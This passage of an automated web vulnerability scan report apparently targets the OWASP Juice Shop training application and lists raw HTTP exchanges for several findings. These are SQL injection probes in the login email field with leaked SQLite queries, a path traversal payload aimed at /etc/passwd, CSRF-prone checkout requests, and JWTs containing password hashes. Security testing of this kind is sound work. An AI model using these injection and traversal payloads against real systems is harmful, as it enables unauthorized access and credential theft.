Cookie: io=_u0wPeQi82ftthU7AAAB
DNT: 1
Connection: close

{"ema
il":"mike_landeck@hotmail.compr5x84\\`z''z\\\"\\\\","password":"juice-shop-password"}

Response 2

HTTP/1.1 401 Unauthorized
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Content-Length: 26
ETag: W/"1a-p+mWIxeVILReWZE35wFTnA"
Date: Sun, 15 Jan 2017 21:14:21 GMT
Connection: close

Invalid email or password.

Request 3

POST /rest/user/login?sp1bvq4o=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Referer: http://192.168.61.143:3000/
Content-Length: 81
Cookie: io=_u0wPeQi82ftthU7AAAB
DNT: 1
Connection: close

{"ema
il":"mike_landeck@hotmail.comrp5hq1\\zz'z","password":"juice-shop-password"}

Response 3

HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Date: Sun, 15 Jan 2017 21:14:27 GMT
Connection: close
Content-Length: 342

{
"error": {
"message": "SQLITE_ERROR: near \"z\": syntax error",
"stack": "Error: SQLITE_ERROR: near \"z\": syntax error\n at Error (native)",
"errno": 1,
"code": "SQLITE_ERROR",
"sql": "SELECT * FROM Users WHERE email = 'mike_landeck@hotmail.comrp5hq1\\zz'z' AND password = 'a992b1b403cba28afb428e7f5a35c516'"
}
}

Request 4

POST /rest/user/login?ypfobdso=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Referer: http://192.168.61.143:3000/
Content-Length: 81
Cookie: io=_u0wPeQi82ftthU7AAAB
DNT: 1
Connection: close

{"ema
il":"mike_landeck@hotmail.comreohb4z\\''z","password":"juice-shop-password"}

Response 4

HTTP/1.1 401 Unauthorized
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Content-Length: 26
ETag: W/"1a-p+mWIxeVILReWZE35wFTnA"
Date: Sun, 15 Jan 2017 21:14:25 GMT
Connection: close

Invalid email or password.

Request 5

POST /rest/user/login?lrjfrdut=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Referer: http://192.168.61.143:3000/
Content-Length: 84
Cookie: io=_u0wPeQi82ftthU7AAAB
DNT: 1
Connection: close

{"ema
il":"mike_landeck@hotmail.comitah06z||'z(z'z","password":"juice-shop-password"}

Response 5

HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Date: Sun, 15 Jan 2017 21:14:31 GMT
Connection: close
Content-Length: 345

{
"error": {
"message": "SQLITE_ERROR: near \"z\": syntax error",
"stack": "Error: SQLITE_ERROR: near \"z\": syntax error\n at Error (native)",
"errno": 1,
"code": "SQLITE_ERROR",
"sql": "SELECT * FROM Users WHERE email = 'mike_landeck@hotmail.comitah06z||'z(z'z' AND password = 'a992b1b403cba28afb428e7f5a35c516'"
}
}

Request 6

POST /rest/user/login?ts0qsf7m=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Referer: http://192.168.61.143:3000/
Content-Length: 83
Cookie: io=_u0wPeQi82ftthU7AAAB
DNT: 1
Connection: close

{"ema
il":"mike_landeck@hotmail.comg7vrm0z(z'||'z","password":"juice-shop-password"}

Response 6

HTTP/1.1 401 Unauthorized
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Content-Length: 26
ETag: W/"1a-p+mWIxeVILReWZE35wFTnA"
Date: Sun, 15 Jan 2017 21:14:28 GMT
Connection: close

Invalid email or password.

Request 7

POST /rest/user/login?w71yz59s=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Referer: http://192.168.61.143:3000/
Content-Length: 83
Cookie: io=_u0wPeQi82ftthU7AAAB
DNT: 1
Connection: close

{"ema
il":"mike_landeck@hotmail.commpmlr6z+'z(z'z","password":"juice-shop-password"}

Response 7

HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Date: Sun, 15 Jan 2017 21:14:34 GMT
Connection: close
Content-Length: 344

{
"error": {
"message": "SQLITE_ERROR: near \"z\": syntax error",
"stack": "Error: SQLITE_ERROR: near \"z\": syntax error\n at Error (native)",
"errno": 1,
"code": "SQLITE_ERROR",
"sql": "SELECT * FROM Users WHERE email = 'mike_landeck@hotmail.commpmlr6z+'z(z'z' AND password = 'a992b1b403cba28afb428e7f5a35c516'"
}
}

Request 8

POST /rest/user/login?posnsh60=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Referer: http://192.168.61.143:3000/
Content-Length: 82
Cookie: io=_u0wPeQi82ftthU7AAAB
DNT: 1
Connection: close

{"ema
il":"mike_landeck@hotmail.comvewgd3z(z'+'z","password":"juice-shop-password"}

Response 8

HTTP/1.1 401 Unauthorized
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Content-Length: 26
ETag: W/"1a-p+mWIxeVILReWZE35wFTnA"
Date: Sun, 15 Jan 2017 21:14:31 GMT
Connection: close

Invalid email or password.

Request 9

POST /rest/user/login?mwbhzvj5=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Referer: http://192.168.61.143:3000/
Content-Length: 83
Cookie: io=_u0wPeQi82ftthU7AAAB
DNT: 1
Connection: close

{"ema
il":"mike_landeck@hotmail.comw9mze4z&'z(z'z","password":"juice-shop-password"}

Response 9

HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Date: Sun, 15 Jan 2017 21:14:37 GMT
Connection: close
Content-Length: 344

{
"error": {
"message": "SQLITE_ERROR: near \"z\": syntax error",
"stack": "Error: SQLITE_ERROR: near \"z\": syntax error\n at Error (native)",
"errno": 1,
"code": "SQLITE_ERROR",
"sql": "SELECT * FROM Users WHERE email = 'mike_landeck@hotmail.comw9mze4z&'z(z'z' AND password = 'a992b1b403cba28afb428e7f5a35c516'"
}
}

Request 10

POST /rest/user/login?z8sgwfry=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Referer: http://192.168.61.143:3000/
Content-Length: 82
Cookie: io=_u0wPeQi82ftthU7AAAB
DNT: 1
Connection: close

{"ema
il":"mike_landeck@hotmail.comocg696z(z'&'z","password":"juice-shop-password"}

Response 10

HTTP/1.1 401 Unauthorized
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Content-Length: 26
ETag: W/"1a-p+mWIxeVILReWZE35wFTnA"
Date: Sun, 15 Jan 2017 21:14:35 GMT
Connection: close

Invalid email or password.

Request 11

POST /rest/user/login?gkxs8dp7=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Referer: http://192.168.61.143:3000/
Content-Length: 87
Cookie: io=_u0wPeQi82ftthU7AAAB
DNT: 1
Connection: close

{"ema
il":"mike_landeck@hotmail.comw1y9d6'||abf(1)||'","password":"juice-shop-password"}

Response 11

HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Date: Sun, 15 Jan 2017 21:14:49 GMT
Connection: close
Content-Length: 342

{
"error": {
"message": "SQLITE_ERROR: no such function: abf",
"stack": "Error: SQLITE_ERROR: no such function: abf\n at Error (native)",
"errno": 1,
"code": "SQLITE_ERROR",
"sql": "SELECT * FROM Users WHERE email = 'mike_landeck@hotmail.comw1y9d6'||abf(1)||'' AND password = 'a992b1b403cba28afb428e7f5a35c516'"
}
}

Request 12

POST /rest/user/login?p9tgm7iy=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Referer: http://192.168.61.143:3000/
Content-Length: 87
Cookie: io=_u0wPeQi82ftthU7AAAB
DNT: 1
Connection: close

{"ema
il":"mike_landeck@hotmail.commjaqd2'||abs(1)||'","password":"juice-shop-password"}

Response 12

HTTP/1.1 401 Unauthorized
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Content-Length: 26
ETag: W/"1a-p+mWIxeVILReWZE35wFTnA"
Date: Sun, 15 Jan 2017 21:14:44 GMT
Connection: close

Invalid email or password.

Request 13

POST /rest/user/login?y0mmkz6p=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Referer: http://192.168.61.143:3000/
Content-Length: 104
Cookie: io=_u0wPeQi82ftthU7AAAB
DNT: 1
Connection: close

{"em
ail":"mike_landeck@hotmail.comlzl684'||min(sqlite_versipn(),1)||'","password":"juice-shop-password"}

Response 13

HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Date: Sun, 15 Jan 2017 21:15:00 GMT
Connection: close
Content-Length: 381

{
"error": {
"message": "SQLITE_ERROR: no such function: sqlite_versipn",
"stack": "Error: SQLITE_ERROR: no such function: sqlite_versipn\n at Error (native)",
"errno": 1,
"code": "SQLITE_ERROR",
"sql": "SELECT * FROM Users WHERE email = 'mike_landeck@hotmail.comlzl684'||min(sqlite_versipn(),1)||'' AND password = 'a992b1b403cba28afb428e7f5a35c516'"
}
}

Request 14

POST /rest/user/login?xmctlma3=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Referer: http://192.168.61.143:3000/
Content-Length: 104
Cookie: io=_u0wPeQi82ftthU7AAAB
DNT: 1
Connection: close

{"em
ail":"mike_landeck@hotmail.comjw7mn3'||min(sqlite_version(),1)||'","password":"juice-shop-password"}

Response 14

HTTP/1.1 401 Unauthorized
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Content-Length: 26
ETag: W/"1a-p+mWIxeVILReWZE35wFTnA"
Date: Sun, 15 Jan 2017 21:14:57 GMT
Connection: close

Invalid email or password.
5. Local File Include
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/jquery/dist/jquery.min.js

Note: This issue was generated by the Burp extension: J2EEScan.

Issue detail

J2EEscan identified a local file include vulnerability. It was possible to retrieve configuration files from the remote system.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2169
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0202
https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion

Request 1

GET /bower_components/jquery/dist/jquery.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=...%2f....%2f%2f%2f...%2f....%2f%2f%2f...%2f....%2f%2f%2f...%2f....%2f%2f%2f...%2f....%2f%2f%2f...%2f....%2f%2f%2fetc%2fpasswd
DNT: 1
Connection: close
Cache-Control: max-age=0

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Tue, 28 Apr 2015 16:03:04 GMT
ETag: W/"1499c-14d00c472c0"
Content-Type: application/javascript
Content-Length: 84380
Date: Sun, 15 Jan 2017 21:12:15 GMT
Connection: close

/*! jQuery v2.1.4 | (c) 2005, 2015 jQuery Foundation, Inc. | jquery.org/license */
!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a)
...[SNIP]...
6. Cross-site request forgery
Previous  Next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://192.168.61.143:3000
Path:   /rest/basket/4/checkout

Issue detail

The request appears to be vulnerable to cross-site request forgery (CSRF) attacks against authenticated users.

Issue background

Cross-site request forgery (CSRF) vulnerabilities may arise when applications rely solely on HTTP cookies to identify the user that has issued a particular request. Because browsers automatically add cookies to requests regardless of their origin, it may be possible for an attacker to create a malicious web site that forges a cross-domain request to the vulnerable application. For a request to be vulnerable to CSRF, the following conditions must hold:

References

Request 1

POST /rest/basket/4/checkout HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=_u0wPeQi82ftthU7AAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
DNT: 1
Connection: close
Content-Length: 0

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Content-Length: 47
ETag: W/"2f-NgEW6rFAE2GfaaE8xDEnKg"
Date: Sun, 15 Jan 2017 21:13:34 GMT
Connection: close

/ftp/order_cc735db3cd7c84a3097fae316e24b361.pdf

Request 2

POST /rest/basket/4/checkout HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://xfyFIQkBbX.com:3000/
Cookie: io=UEi7oDbiwsEFhRthAAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg; email=mike_landeck%40hotmail.com
DNT: 1
Connection: close
Content-Length: 0
Content-Type: application/x-www-form-urlencoded

Response 2

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Content-Length: 47
ETag: W/"2f-ZhtivIomvV4AP6tTvbcmVg"
Date: Sun, 15 Jan 2017 21:45:36 GMT
Connection: close

/ftp/order_aa1708b461081ba18b8f851dd10a5ec4.pdf
7. The JavaScript file 'jquery.min.js' includes a vulnerable version of the library 'jquery'
Previous  Next

Summary

Severity:   Medium
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/jquery/dist/jquery.min.js

Note: This issue was generated by the Burp extension: Retire.js.

Issue detail

The library jquery version 2.1.4 has known security issues.
For more information, visit those websites:

  • https://github.com/jquery/jquery/issues/2432
  • http://blog.jquery.com/2016/01/08/jquery-2-2-and-1-12-released/
  • <h3>Affected versions</h3>

    The vulnerability is affecting all versions prior 3.0.0-beta1 (between 1.12.3 and 3.0.0-beta1)

    <h3>Other considerations</h3>

    The vulnerability might be affecting a feature of the library that the website is not using. If the vulnerable feature is not used, this alert can be consider as false positive.

    The library name and its version are identify based on a Retire.js signature. If the library identification is not correct, the prior vulnerability does not apply.

    Request 1

    GET /bower_components/jquery/dist/jquery.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Tue, 28 Apr 2015 16:03:04 GMT
    ETag: W/"1499c-14d00c472c0"
    Content-Type: application/javascript
    Content-Length: 84380
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    /*! jQuery v2.1.4 | (c) 2005, 2015 jQuery Foundation, Inc. | jquery.org/license */
    !function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a)
    ...[SNIP]...
    8. Password submitted using GET method
    Previous  Next

    There are 3 instances of this issue:

    Issue background

    Some applications use the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

    Vulnerabilities that result in the disclosure of users' passwords can result in compromises that are extremely difficult to investigate due to obscured audit trails. Even if the application itself only handles non-sensitive information, exposing passwords puts users who have re-used their password elsewhere at risk.



    8.1. http://192.168.61.143:3000/dist/juice-shop.min.js
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /dist/juice-shop.min.js

    Issue detail

    The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password fields:

    Request 1

    GET /dist/juice-shop.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 01:05:12 GMT
    ETag: W/"10e10-15942f5a540"
    Content-Type: application/javascript
    Content-Length: 69136
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    angular.module("juiceShop",["ngRoute","ngCookies","ngTouch","ngAnimate","ngFileUpload","ui.bootstrap","pascalprecht.translate","btford.socket-io","ngclipboard","base64","monospaced.qrcode"]),angular.m
    ...[SNIP]...
    <div>\n\n <form role="form" name="form" novalidate>\n\n <div class="alert-info" ng-show="confirmation && !form.$dirty">
    ...[SNIP]...
    </label>\n <input type="password" class="form-control input-sm" id="currentPassword" name="currentPassword" ng-model="currentPassword" required/>\n </div>
    ...[SNIP]...
    </label>\n <input type="password" class="form-control input-sm" id="newPassword" name="newPassword" ng-model="newPassword" required ng-minlength="5" ng-maxlength="20"/>\n </div>
    ...[SNIP]...
    </label>\n <input type="password" class="form-control input-sm" id="newPasswordRepeat" name="newPasswordRepeat" ng-model="newPasswordRepeat" required/>\n </div>
    ...[SNIP]...
    8.2. http://192.168.61.143:3000/dist/juice-shop.min.js
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /dist/juice-shop.min.js

    Issue detail

    The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password fields:

    Request 1

    GET /dist/juice-shop.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 01:05:12 GMT
    ETag: W/"10e10-15942f5a540"
    Content-Type: application/javascript
    Content-Length: 69136
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    angular.module("juiceShop",["ngRoute","ngCookies","ngTouch","ngAnimate","ngFileUpload","ui.bootstrap","pascalprecht.translate","btford.socket-io","ngclipboard","base64","monospaced.qrcode"]),angular.m
    ...[SNIP]...
    </h3>\n\n <form role="form" name="form" novalidate>\n\n <div class="alert-danger" ng-show="form.$invalid && form.$dirty">
    ...[SNIP]...
    </label>\n <input type="password" class="form-control input-sm" id="userPassword" name="userPassword" ng-model="user.password" required ng-minlength="5" ng-maxlength="20"/>\n </div>
    ...[SNIP]...
    </label>\n <input type="password" class="form-control input-sm" id="userPasswordRepeat" name="userPasswordRepeat" ng-model="user.passwordRepeat" required/>\n </div>
    ...[SNIP]...
    8.3. http://192.168.61.143:3000/dist/juice-shop.min.js
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /dist/juice-shop.min.js

    Issue detail

    The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password fields:

    Request 1

    GET /dist/juice-shop.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=_u0wPeQi82ftthU7AAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 01:05:12 GMT
    ETag: W/"10e10-15942f5a540"
    Content-Type: application/javascript
    Content-Length: 69136
    Date: Sun, 15 Jan 2017 21:02:00 GMT
    Connection: close

    angular.module("juiceShop",["ngRoute","ngCookies","ngTouch","ngAnimate","ngFileUpload","ui.bootstrap","pascalprecht.translate","btford.socket-io","ngclipboard","base64","monospaced.qrcode"]),angular.m
    ...[SNIP]...
    </h3>\n\n <form role="form" name="form" novalidate>\n\n <div class="alert-danger" ng-show="form.$invalid && form.$dirty">
    ...[SNIP]...
    </label>\n <input type="password" class="form-control input-sm" id="userPassword" name="userPassword" ng-model="user.password" required ng-minlength="5" ng-maxlength="20"/>\n </div>
    ...[SNIP]...
